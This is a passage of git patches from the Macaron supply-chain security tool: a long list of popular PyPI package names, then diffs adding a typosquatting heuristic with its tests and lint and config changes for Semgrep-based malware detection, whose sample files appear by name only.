+email-reply-parser +bindep +keras-tuner +amundsen-common +mypy-boto3-neptunedata +mypy-boto3-translate +capsolver +statistics +mkdocs-mermaid2-plugin +robocorp-log +alibabacloud-endpoint-util +beanie +python-dynamodb-lock +alibabacloud-tea-xml +google-i18n-address +nvidia-ml-py3 +jax-cuda12-plugin +prospector +fds-sdk-utils +mergepythonclient +mypy-boto3-pinpoint +colorzero +gpiozero +pylibmc +returns +ip2location +pandas-datareader +mypy-boto3-sesv2 +apispec-webframeworks +pydomo +construct-typing +mygeotab +pywebpush +mypy-boto3-codeartifact +ada-url +dagster-snowflake +ase +hass-web-proxy-lib +stable-baselines3 +path-py +sccache +crochet +mypy-boto3-rds-data +fastapi-cache2 +simple-azure-blob-downloader +lizard +django-select2 +geojson-pydantic +pyspark-pandas +autogluon-core +jupyter-kernel-gateway +django-migration-linter +django-cleanup +simpervisor +azure-schemaregistry-avroencoder +ipaddr +django-rest-swagger +apache-airflow-providers-sendgrid +pyarmor +flask-swagger-ui +pyhdb +cron-schedule-triggers +dissect-target +fastembed +aiogoogle +lazy-imports +imap-tools +tox-ansible +lakefs-client +lcov-cobertura +salesforce-fuelsdk-sans +python-tds +twofish +tmtools +mnemonic +zope-i18nmessageid +fs-s3fs +mypy-boto3-ram +open-webui +llguidance +mypy-boto3-servicecatalog +mkl +pulp-cli-deb +mypy-boto3-location +splink +jax-cuda12-pjrt +pyxnat +py-grpc-prometheus +cdktf +pulp-glue-deb +llama-cpp-python +mypy-boto3-marketplace-entitlement +py-vapid +mypy-boto3-sso-oidc +coredis +coremltools +airflow-provider-lakefs +segtok +faiss-gpu +pockets +mypy-boto3-comprehend +mypy-boto3-securityhub +mypy-boto3-support +cmudict +starlark-pyo3 +stackprinter +sgp4 +mypy-boto3-mediaconvert +idf-component-manager +mypy-boto3-s3control +pyqtwebengine +qiskit-aer +e2b-code-interpreter +mypy-boto3-meteringmarketplace +mypy-boto3-service-quotas +mypy-boto3-synthetics +granian +clize +delocate +dbx +typos +pyprctl +pantab +rocketchat-api +prettyprinter +spaces +mypy-boto3-elb 
+sorl-thumbnail +dateformat +oauth2-client +hypothesis-graphql +mypy-boto3-mwaa +pydoe +mypy-boto3-route53resolver +parsl +mypy-boto3-guardduty +bpyutils +certvalidator +ffmpeg +trie +azureml-pipeline +meraki +randomname +pycobertura +pypd +mypy-boto3-connect +mypy-boto3-workspaces +valkey +mypy-boto3-amplify +gurobipy +jupyter-contrib-nbextensions +httpstan +dodgy +mypy-boto3-rekognition +stanza +mypy-boto3-sso-admin +fcache +neotime +empy +mypy-boto3-directconnect +portend +ua-parser-rs +mypy-boto3-acm-pca +dagster-pyspark +opentelemetry-instrumentation-langchain +yara-python +kaldiio +pyatlan +runez +apify-shared +mypy-boto3-cloudsearch +cut-cross-entropy +purecloudplatformclientv2 +yolo +od +einx +elasticsearch-curator +pyobjc-framework-cocoa +databind +mypy-boto3-cloudsearchdomain +pycaret +mypy-boto3-budgets +mypy-boto3-docdb +mypy-boto3-polly +auditwheel +py-bip39-bindings +django-money +clu +pyathenajdbc +mypy-boto3-license-manager +mypy-boto3-shield +mypy-boto3-storagegateway +mypy-boto3-appmesh +mypy-boto3-ec2-instance-connect +fastwarc +mypy-boto3-appsync +types-passlib +visitor +mypy-boto3-resource-groups +formencode +sliceline +mypy-boto3-mediaconnect +mypy-boto3-medialive +djangorestframework-jwt +mypy-boto3-kinesis-video-media +mypy-boto3-swf +mypy-boto3-waf +fds-sdk-paengine +mypy-boto3-machinelearning +mypy-boto3-lightsail +mypy-boto3-neptune +spark-expectations +case-conversion +ptvsd +mypy-boto3-lex-models +mypy-boto3-sdb +fds-sdk-sparengine +einops-exts +fds-protobuf-stach-extensions +mypy-boto3-serverlessrepo +mypy-boto3-kinesisvideo +mypy-boto3-kendra +sagemaker-datawrangler +varint +sphinxcontrib-napoleon +mypy-boto3-accessanalyzer +mypy-boto3-comprehendmedical +mypy-boto3-workmail +fds-protobuf-stach-v2 +batchgenerators +types-aiobotocore-sns +mypy-boto3-kinesis-video-archived-media +fds-protobuf-stach +mypy-boto3-fsx +mypy-boto3-iotsecuretunneling +mypy-boto3-workdocs +mypy-boto3-lex-runtime +mypy-boto3-outposts +bzt +mypy-boto3-snowball 
+mypy-boto3-backup +mypy-boto3-pi +mypy-boto3-waf-regional +autologging +mypy-boto3-marketplace-catalog +mypy-boto3-workmailmessageflow +ag2 +mypy-boto3-route53domains +mypy-boto3-timestream-write +mypy-boto3-qldb-session +mypy-boto3-sagemaker-a2i-runtime +mypy-boto3-kinesisanalytics +mypy-boto3-kinesisanalyticsv2 +mypy-boto3-codecommit +stestr +mypy-boto3-chime +mypy-boto3-pinpoint-email +mypy-boto3-mediatailor +mypy-boto3-personalize +pytest-explicit +simplefix +mypy-boto3-robomaker +basistheory +mypy-boto3-kinesis-video-signaling +mypy-boto3-mq +mypy-boto3-opsworks +pylint-celery +pytest-flake8 +spacy-curated-transformers +mypy-boto3-appstream +mypy-boto3-managedblockchain +torch-model-archiver +mypy-boto3-sms +mypy-boto3-pinpoint-sms-voice +bridgecrew +mypy-boto3-mediapackage-vod +mypy-boto3-gamelift +mypy-boto3-mturk +mypy-boto3-iotevents +viztracer +dagster-datadog +dj-rest-auth +mypy-boto3-mediapackage +mypy-boto3-imagebuilder +braintrust-api +mypy-boto3-health +mypy-boto3-mediastore-data +mypy-boto3-marketplacecommerceanalytics +mypy-boto3-savingsplans +mypy-boto3-mediastore +mypy-boto3-networkmanager +mypy-boto3-opsworkscm +mypy-boto3-qldb +arcticdb +mypy-boto3-iotthingsgraph +uptime-kuma-api +mypy-boto3-fms +mypy-boto3-compute-optimizer +mypy-boto3-sms-voice +mypy-boto3-iotanalytics +mypy-boto3-groundstation +mypy-boto3-mgh +spider-client +mypy-boto3-glacier +django-webtest +types-google-cloud-ndb +mypy-boto3-datasync +mypy-boto3-importexport +mypy-boto3-personalize-events +methoddispatch +globus-compute-endpoint +reprint +mypy-boto3-personalize-runtime +mypy-boto3-inspector +mypy-boto3-globalaccelerator +mypy-boto3-cognito-sync +mypy-boto3-cur +autogluon-features +mypy-boto3-ds +mypy-boto3-migrationhub-config +mypy-boto3-forecast +mypy-boto3-application-insights +mypy-boto3-codestar-notifications +mypy-boto3-elasticbeanstalk +mypy-boto3-iotevents-data +apache-airflow-providers-apache-beam +tm1py +mypy-boto3-iot-jobs-data +mypy-boto3-greengrass 
+mypy-boto3-iotsitewise +jupyter-contrib-core +mypy-boto3-emr-containers +mcap +mypy-boto3-clouddirectory +msgpack-numpy +awsebcli +mypy-boto3-autoscaling-plans +aiorun +pylibsrtp +evervault-attestation-bindings +starlette-testclient +yaml-config +mypy-boto3-ivs-realtime +mypy-boto3-cloud9 +mypy-boto3-cloudhsmv2 +django-configurations +tgcrypto +kedro-telemetry +mypy-boto3-dax +mypy-boto3-codeguru-reviewer +prefect-shell +mypy-boto3-forecastquery +secure +docling-core +mypy-boto3-devicefarm +ast-grep-cli +azure-ai-contentsafety +pysnmpcrypto +mypy-boto3-datapipeline +mypy-boto3-connectparticipant +markdown-exec +mypy-boto3-frauddetector +django-recaptcha +usaddress-scourgify +python-mimeparse +mypy-boto3-codestar-connections +gin-config +amundsen-databuilder +mypy-boto3-detective +mypy-boto3-discovery +mypy-boto3-cloudhsm +mypy-boto3-codeguruprofiler +pip-install-test +sox +panns-inference +dag-factory +tempita +evervault +mypy-boto3-elastictranscoder +sqlean-py +draftjs-exporter +mypy-boto3-macie2 +patchy +meltano +ibm-secrets-manager-sdk +pyjson5 +mdxpy +pylcs +munkres +mypy-boto3-ecr-public +python-debian +pyicu-binary +ws4py +aiotask-context +fugashi +cpplint +dagster-shell +mypy-boto3-bedrock-agent-runtime +python-schema-registry-client +meross-iot +pyocd +pyreadline +sspilib +hachoir +mypy-boto3-network-firewall +jc +rapidocr-onnxruntime +assisted-service-client +mypy-boto3-ivs +arize +mypy-boto3-appconfigdata +mypy-boto3-braket +autovizwidget +pybreaker +dbt-athena +flask-sock +pysolr +types-zstd +dm-control +hdijupyterutils +pyarabic +discord +python-binance +inscribe +g2p-en +pydeprecate +pypandoc-binary +extensionclass +antithesis +coiled +globus-identity-mapping +donfig +zope-location +doc8 +tensorflow-decision-forests +requirements-detector +literalai +mypy-boto3-s3outposts +heapdict +lifetimes +mypy-boto3-sagemaker-featurestore-runtime +semantic-link-sempy +mypy-boto3-sagemaker-edge +canopen +autogluon-tabular +mypy-boto3-servicecatalog-appregistry 
+files-com +streamlit-keyup +times +mypy-boto3-auditmanager +gfpgan +mypy-boto3-amp +livekit-agents +slack +mypy-boto3-iotwireless +wiki-fetch +together +wagtail +mypy-boto3-wellarchitected +pyroscope-io +flet +mypy-boto3-elastic-inference +mypy-boto3-bedrock-agent +reverse-geocoder +bravado-core +mypy-boto3-lookoutvision +sphinxcontrib-plantuml +autoray +mypy-boto3-amplifybackend +azureml-sdk +toml-sort +mypy-boto3-databrew +google-cloud-profiler +equinox +flask-apispec +asammdf +airtable +mypy-boto3-healthlake +impacket +mypy-boto3-appintegrations +pyro-ppl +mypy-boto3-greengrassv2 +mypy-boto3-lexv2-models +icalevents +mypy-boto3-customer-profiles +fastdtw +pennylane-lightning +css-inline +mypy-boto3-iotdeviceadvisor +mypy-boto3-lexv2-runtime +mypy-boto3-connect-contact-lens +zope-security +mypy-boto3-devops-guru +pdm-pep517 +pydrive +django-dirtyfields +paypalrestsdk +mltable +mypy-boto3-iotfleethub +djangorestframework-camel-case +phonemizer +distance +mkdocs-include-markdown-plugin +graphql-query +arxiv +measurement +jplephem +syncer +aioice +autogluon +python-openid +pyreadstat +amundsen-rds +azureml-inference-server-http +drf-jwt +mypy-boto3-lookoutmetrics +globus-compute-sdk +websocket +aws-kinesis-agg +pwlf +mypy-boto3-lookoutequipment +jaro-winkler +marshmallow3-annotations +mypy-boto3-mgn +mypy-boto3-fis +rust-demangler +pymupdf4llm +rlbot +pykcs11 +esp-idf-kconfig +flake8-string-format +flake8-pytest-style +mypy-boto3-s3tables +bce-python-sdk +mypy-boto3-account +human-json +mypy-boto3-payment-cryptography +mypy-boto3-ssm-incidents +mypy-boto3-apprunner +acres +mypy-boto3-payment-cryptography-data +adbc-driver-manager +typed-argument-parser +mypy-boto3-finspace +mypy-boto3-finspace-data +wiremock +mypy-boto3-ssm-contacts +kt-legacy +mypy-boto3-proton +pyvisa-py +mypy-boto3-applicationcostprofiler +youtube-dl +pybars4 +botbuilder-schema +better-exceptions +mypy-boto3-grafana +gcloud-aio-datastore +awslimitchecker +pylogbeat +pandas-flavor +keras-nightly 
+bump-my-version +smartystreets-python-sdk +tls-client +prefect-ray +mypy-boto3-cloudcontrol +simplekml +rpmfile +tensorflow-model-optimization +prisma +mypy-boto3-route53-recovery-control-config +xmldiff +pythran +pyproject-flake8 +connected-components-3d +django-admin-list-filter-dropdown +mypy-boto3-memorydb +mypy-boto3-chime-sdk-messaging +hist +mypy-boto3-redshift-serverless +mypy-boto3-wisdom +mypy-boto3-route53-recovery-readiness +mypy-boto3-route53-recovery-cluster +mypy-boto3-chime-sdk-identity +django-autocomplete-light +docling-parse +pymap3d +stopit +records +mediapy +cmsis-pack-manager +mypy-boto3-inspector2 +python-jsonpath +mypy-boto3-snow-device-management +azure-eventhub-checkpointstoreblob-aio +mypy-boto3-kafkaconnect +mypy-boto3-voice-id +mypy-boto3-keyspaces +pytest-codspeed +cmake-format +mplcursors +unleashclient +versionfinder +nameof +anyjson +botframework-connector +zmq +mypy-boto3-marketplace-agreement +mypy-boto3-workspaces-web +localstack +mypy-boto3-pinpoint-sms-voice-v2 +requests-gssapi +mypy-boto3-verifiedpermissions +exrex +fireworks-ai +djangorestframework-xml +mypy-boto3-opensearchserverless +mypy-boto3-cleanrooms +streamlit-folium +flake8-rst-docstrings +mypy-boto3-panorama +mypy-boto3-chime-sdk-meetings +dbt-trino +gjson +mypy-boto3-amplifyuibuilder +tencentcloud-sdk-python +mypy-boto3-billingconductor +mypy-boto3-datazone +mypy-boto3-backup-gateway +mypy-boto3-migrationhubstrategy +mypy-boto3-drs +mypy-boto3-evidently +mypy-boto3-resiliencehub +django-log-request-id +arize-phoenix +mypy-boto3-iottwinmaker +mypy-boto3-iotfleetwise +mypy-boto3-omics +mypy-boto3-rum +mypy-boto3-migration-hub-refactor-spaces +mypy-boto3-workspaces-thin-client +mypy-boto3-connectcases +crontab +chess +mypy-boto3-chime-sdk-media-pipelines +mypy-boto3-chime-sdk-voice +mypy-boto3-ivschat +mypy-boto3-rbin +extra-streamlit-components +mypy-boto3-controltower +mypy-boto3-qbusiness +stream-inflate +mypy-boto3-arc-zonal-shift +mypy-boto3-support-app 
+mypy-boto3-vpc-lattice +gcloud-rest-datastore +mypy-boto3-b2bi +mypy-boto3-connectcampaigns +mypy-boto3-timestream-influxdb +mypy-boto3-m2 +pygam +mypy-boto3-ssm-sap +mypy-boto3-application-signals +mypy-boto3-cost-optimization-hub +luigi +mypy-boto3-codecatalyst +mypy-boto3-license-manager-user-subscriptions +etuples +mypy-boto3-cloudtrail-data +mypy-boto3-cleanroomsml +mypy-boto3-tnb +mypy-boto3-appfabric +mypy-boto3-osis +mypy-boto3-mediapackagev2 +lap +mypy-boto3-kendra-ranking +mypy-boto3-bcm-data-exports +eccodes +mypy-boto3-resource-explorer-2 +mypy-boto3-rolesanywhere +mypy-boto3-sagemaker-metrics +mypy-boto3-internetmonitor +plyfile +rejson +mypy-boto3-taxsettings +mypy-boto3-entityresolution +mypy-boto3-artifact +mypy-boto3-neptune-graph +mypy-boto3-codeguru-security +mypy-boto3-pipes +text-generation +mypy-boto3-trustedadvisor +mypy-boto3-supplychain +mypy-boto3-migrationhuborchestrator +mypy-boto3-cloudfront-keyvaluestore +cwcwidth +django-rest-polymorphic +mypy-boto3-chatbot +stream-unzip +mypy-boto3-controlcatalog +mypy-boto3-securitylake +mypy-boto3-privatenetworks +python-jwt +mypy-boto3-oam +mypy-boto3-docdb-elastic +apache-airflow-providers-apprise +mypy-boto3-apptest +mypy-boto3-qconnect +mypy-boto3-simspaceweaver +mypy-boto3-kinesis-video-webrtc-storage +adtk +py3langid +mypy-boto3-mailmanager +paramiko-expect +mypy-boto3-pca-connector-ad +mypy-boto3-freetier +mypy-boto3-medical-imaging +mypy-boto3-managedblockchain-query +mypy-boto3-codeconnections +mypy-boto3-launch-wizard +mypy-boto3-deadline diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 7c83f637f..e0e179e7f 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -23,6 +23,7 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.high_release_frequency import 
HighReleaseFrequencyAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.one_release import OneReleaseAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.source_code_repo import SourceCodeRepoAnalyzer +from macaron.malware_analyzer.pypi_heuristics.metadata.typosquatting_presence import TyposquattingPresenceAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.unchanged_release import UnchangedReleaseAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.wheel_absence import WheelAbsenceAnalyzer from macaron.malware_analyzer.pypi_heuristics.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer @@ -333,7 +334,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: SuspiciousSetupAnalyzer, WheelAbsenceAnalyzer, AnomalousVersionAnalyzer, - WhiteSpacesAnalyzer, + TyposquattingPresenceAnalyzer, ] # name used to query the result of all problog rules, so it can be accessed outside the model. @@ -383,9 +384,9 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: failed({Heuristics.CLOSER_RELEASE_JOIN_DATE.value}), forceSetup. - % Package released with excessive whitespace in the code . + % Package released with a name similar to a popular package. {Confidence.HIGH.value}::trigger(malware_high_confidence_4) :- - forceSetup, failed({Heuristics.WHITE_SPACES.value}). + quickUndetailed, forceSetup, failed({Heuristics.TYPOSQUATTING_PRESENCE.value}). % Package released recently with little detail, with multiple releases as a trust marker, but frequent and with % the same code. diff --git a/tests/malware_analyzer/pypi/test_typosquatting_presence.py b/tests/malware_analyzer/pypi/test_typosquatting_presence.py new file mode 100644 index 000000000..2d23233a2 --- /dev/null +++ b/tests/malware_analyzer/pypi/test_typosquatting_presence.py @@ -0,0 +1,88 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. 
+# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Tests for the TyposquattingPresenceAnalyzer heuristic.""" + + +import os +from pathlib import Path +from unittest.mock import MagicMock + +import pytest + +from macaron.errors import HeuristicAnalyzerValueError +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult +from macaron.malware_analyzer.pypi_heuristics.metadata.typosquatting_presence import TyposquattingPresenceAnalyzer + + +@pytest.fixture(name="analyzer") +def analyzer_(tmp_path: Path) -> TyposquattingPresenceAnalyzer: + """Pytest fixture to create a TyposquattingPresenceAnalyzer instance with a dummy popular packages file.""" + # Create a dummy popular packages file. + pkg_file = Path(os.path.join(tmp_path, "popular.txt")) + popular_packages = ["requests", "flask", "pytest"] + pkg_file.write_text("\n".join(popular_packages), encoding="utf-8") + analyzer_instance = TyposquattingPresenceAnalyzer(str(pkg_file)) + return analyzer_instance + + +def test_analyze_exact_match_pass(analyzer: TyposquattingPresenceAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer passes when the package name is an exact match to a popular package.""" + pypi_package_json.component_name = "requests" + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.PASS + assert info == {"package_name": "requests"} + + +def test_analyze_similar_name_fail(analyzer: TyposquattingPresenceAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer fails when the package name is suspiciously similar to a popular package.""" + pypi_package_json.component_name = "reqursts" + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.FAIL + assert info["package_name"] == "reqursts" + assert info["popular_package"] == "requests" + # The ratio should match or exceed threshold. 
+ assert isinstance(info["similarity_ratio"], float) + assert info["similarity_ratio"] >= analyzer.distance_ratio_threshold + + +def test_analyze_unrelated_name_pass(analyzer: TyposquattingPresenceAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer passes when the package name is not similar to any popular package.""" + pypi_package_json.component_name = "launchable" + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.PASS + assert info == {"package_name": "launchable"} + + +def test_analyze_nonexistent_file_skip() -> None: + """Test the analyzer raises an error if the popular packages file does not exist.""" + with pytest.raises(HeuristicAnalyzerValueError) as exc_info: + TyposquattingPresenceAnalyzer("nonexistent_file.txt") + assert "Popular packages file not found or path not configured" in str(exc_info.value) + + +@pytest.mark.parametrize( + ("package1", "package2", "expected_ratio"), + [ + ("requests", "requests", 1.0), + ("reqursts", "requests", 11 / 12), + ("abcd", "wxyz", 0.0), + ], +) +def test_jaro_distance( + analyzer: TyposquattingPresenceAnalyzer, package1: str, package2: str, expected_ratio: float +) -> None: + """Test the Jaro distance calculation.""" + assert analyzer.jaro_distance(package1, package2) == expected_ratio + + +def test_empty_popular_packages_file(tmp_path: Path, pypi_package_json: MagicMock) -> None: + """Test the analyzer skips when the popular packages file is empty.""" + pkg_file = Path(os.path.join(tmp_path, "empty_popular.txt")) + pkg_file.write_text("", encoding="utf-8") + analyzer_instance = TyposquattingPresenceAnalyzer(str(pkg_file)) + result, info = analyzer_instance.analyze(pypi_package_json) + assert result == HeuristicResult.SKIP + error_msg = info.get("warning") + assert isinstance(error_msg, str) + assert "Popular packages file is empty" in error_msg From a470123e8bb39265347f037868b711743c4c9182 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 4 Jun 2025 
14:05:32 +1000 Subject: [PATCH 05/14] refactor: improve experimental source code pattern analysis of pypi packages (#965) Include support for using Semgrep for analysis of source code to detect malicious code patterns, specified using Semgrep's YAML files. Signed-off-by: Carl Flottmann --- .pre-commit-config.yaml | 18 + .semgrepignore | 1 + CONTRIBUTING.md | 4 + docker/Dockerfile.final | 2 +- ...re_analyzer.pypi_heuristics.sourcecode.rst | 8 + pyproject.toml | 11 +- .../samples_permissions_checker.sh | 37 ++ src/macaron/__main__.py | 23 +- src/macaron/config/defaults.ini | 25 +- src/macaron/errors.py | 4 + src/macaron/malware_analyzer/README.md | 50 +- .../pypi_heuristics/heuristics.py | 3 + .../pypi_sourcecode_analyzer.py | 491 ------------------ .../sourcecode/pypi_sourcecode_analyzer.py | 330 ++++++++++++ .../pypi_heuristics/suspicious_pattern.yaml | 101 ---- src/macaron/repo_finder/repo_finder_pypi.py | 2 +- .../pypi_malware_rules/exfiltration.yaml | 271 ++++++++++ .../pypi_malware_rules/obfuscation.yaml | 313 +++++++++++ src/macaron/slsa_analyzer/analyze_context.py | 9 +- src/macaron/slsa_analyzer/analyzer.py | 24 +- .../checks/detect_malicious_metadata_check.py | 84 ++- .../package_registry/pypi_registry.py | 277 +++++++--- src/macaron/util.py | 8 +- .../check_sourcecode_patterns.sh | 14 + .../policy-sourcecode.dl | 10 + .../test.yaml | 25 +- .../pypi/resources/custom_sample.yaml | 23 + .../exfiltration/expected_results.json | 25 + .../exfiltration/remote_exfiltration.py | 50 ++ .../obfuscation/decode_and_execute.py | 67 +++ .../obfuscation/expected_results.json | 235 +++++++++ .../obfuscation/inline_imports.py | 32 ++ .../obfuscation/obfuscation_tools.py | 69 +++ .../pypi/test_pypi_sourcecode_analyzer.py | 290 +++++++++++ .../test_detect_malicious_metadata_check.py | 30 +- 35 files changed, 2245 insertions(+), 721 deletions(-) create mode 100644 .semgrepignore create mode 100755 scripts/dev_scripts/samples_permissions_checker.sh delete mode 100644 
src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py create mode 100644 src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py delete mode 100644 src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml create mode 100644 src/macaron/resources/pypi_malware_rules/exfiltration.yaml create mode 100644 src/macaron/resources/pypi_malware_rules/obfuscation.yaml create mode 100755 tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/check_sourcecode_patterns.sh create mode 100644 tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/policy-sourcecode.dl create mode 100644 tests/malware_analyzer/pypi/resources/custom_sample.yaml create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py create mode 100644 tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index bc55cb969..034608f19 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -30,6 +30,7 @@ repos: - id: isort name: Sort import statements args: [--settings-path, pyproject.toml] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* # Add Black code formatters. 
- repo: https://github.com/ambv/black @@ -38,6 +39,7 @@ repos: - id: black name: Format code args: [--config, pyproject.toml] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* - repo: https://github.com/asottile/blacken-docs rev: 1.19.1 hooks: @@ -65,6 +67,7 @@ repos: files: ^src/macaron/|^tests/ types: [text, python] additional_dependencies: [flake8-bugbear==22.10.27, flake8-builtins==2.0.1, flake8-comprehensions==3.10.1, flake8-docstrings==1.6.0, flake8-mutable==1.2.0, flake8-noqa==1.4.0, flake8-pytest-style==1.6.0, flake8-rst-docstrings==0.3.0, pep8-naming==0.13.2] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* args: [--config, .flake8] # Check GitHub Actions workflow files. @@ -82,6 +85,7 @@ repos: entry: pylint language: python files: ^src/macaron/|^tests/ + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* types: [text, python] args: [--rcfile, pyproject.toml] @@ -94,6 +98,7 @@ repos: language: python files: ^src/macaron/|^tests/ types: [text, python] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* args: [--show-traceback, --config-file, pyproject.toml] # Check for potential security issues. @@ -106,6 +111,7 @@ repos: files: ^src/macaron/|^tests/ types: [text, python] additional_dependencies: ['bandit[toml]'] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* # Enable a whole bunch of useful helper hooks, too. # See https://pre-commit.com/hooks.html for more hooks. 
@@ -197,6 +203,18 @@ repos: always_run: true pass_filenames: false +# Checks that tests/malware_analyzer/pypi/resources/sourcecode_samples files do not have executable permissions +# This is another measure to make sure the files can't be accidentally executed +- repo: local + hooks: + - id: sourcecode-sample-permissions + name: Sourcecode sample executable permissions checker + entry: scripts/dev_scripts/samples_permissions_checker.sh + language: system + always_run: true + pass_filenames: false + + # A linter for Golang - repo: https://github.com/golangci/golangci-lint rev: v1.64.6 diff --git a/.semgrepignore b/.semgrepignore new file mode 100644 index 000000000..3d53fd964 --- /dev/null +++ b/.semgrepignore @@ -0,0 +1 @@ +# Items added to this file will be ignored by Semgrep. diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 6cc6516fb..3e21b8e57 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -72,6 +72,10 @@ See below for instructions to set up the development environment. - PRs should be merged using the `Squash and merge` strategy. In most cases a single commit with a detailed commit message body is preferred. Make sure to keep the `Signed-off-by` line in the body. +### PyPI Malware Detection Contribution + +Please see the [README for the malware analyzer](./src/macaron/malware_analyzer/README.md) for information on contributing Heuristics and code patterns. + ## Branching model * The `main` branch should be used as the base branch for pull requests. The `release` branch is designated for releases and should only be merged into when creating a new release for Macaron. diff --git a/docker/Dockerfile.final b/docker/Dockerfile.final index ad1d88c19..49c1071cf 100644 --- a/docker/Dockerfile.final +++ b/docker/Dockerfile.final @@ -46,7 +46,7 @@ RUN : \ && . 
.venv/bin/activate \ && pip install --no-compile --no-cache-dir --upgrade pip setuptools \ && find $HOME/dist -depth \( -type f \( -name "macaron-*.whl" \) \) -exec pip install --no-compile --no-cache-dir '{}' \; \ - && pip uninstall semgrep \ + && pip uninstall semgrep -y \ && find $HOME/dist -depth \( -type f \( -name "semgrep-*.whl" \) \) -exec pip install --no-compile --no-cache-dir '{}' \; \ && rm -rf $HOME/dist \ && deactivate diff --git a/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst b/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst index f53afc8d8..50b2b472d 100644 --- a/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst +++ b/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst @@ -9,6 +9,14 @@ macaron.malware\_analyzer.pypi\_heuristics.sourcecode package Submodules ---------- +macaron.malware\_analyzer.pypi\_heuristics.sourcecode.pypi\_sourcecode\_analyzer module +--------------------------------------------------------------------------------------- + +.. 
automodule:: macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer + :members: + :undoc-members: + :show-inheritance: + macaron.malware\_analyzer.pypi\_heuristics.sourcecode.suspicious\_setup module ------------------------------------------------------------------------------ diff --git a/pyproject.toml b/pyproject.toml index 6cae94f7a..74705364b 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -37,6 +37,7 @@ dependencies = [ "beautifulsoup4 >= 4.12.0,<5.0.0", "problog >= 2.2.6,<3.0.0", "cryptography >=44.0.0,<45.0.0", + "semgrep == 1.113.0", ] keywords = [] # https://pypi.org/classifiers/ @@ -119,12 +120,14 @@ Issues = "https://github.com/oracle/macaron/issues" [tool.bandit] tests = [] skips = ["B101"] - +exclude_dirs = ['tests/malware_analyzer/pypi/resources/sourcecode_samples'] # https://github.com/psf/black#configuration [tool.black] line-length = 120 - +force-exclude = ''' +tests/malware_analyzer/pypi/resources/sourcecode_samples/ +''' # https://github.com/commitizen-tools/commitizen # https://commitizen-tools.github.io/commitizen/bump/ @@ -170,7 +173,6 @@ exclude = [ "SECURITY.md", ] - # https://pycqa.github.io/isort/ [tool.isort] profile = "black" @@ -181,7 +183,6 @@ skip_gitignore = true # https://mypy.readthedocs.io/en/stable/config_file.html#using-a-pyproject-toml [tool.mypy] -# exclude= show_error_codes = true show_column_numbers = true check_untyped_defs = true @@ -209,7 +210,6 @@ module = [ ] ignore_missing_imports = true - # https://pylint.pycqa.org/en/latest/user_guide/configuration/index.html [tool.pylint.MASTER] fail-under = 10.0 @@ -261,6 +261,7 @@ addopts = """-vv -ra --tb native \ --doctest-modules --doctest-continue-on-failure --doctest-glob '*.rst' \ --cov macaron \ --ignore tests/integration \ + --ignore tests/malware_analyzer/pypi/resources/sourcecode_samples \ """ # Consider adding --pdb # https://docs.python.org/3/library/doctest.html#option-flags doctest_optionflags = "IGNORE_EXCEPTION_DETAIL" diff 
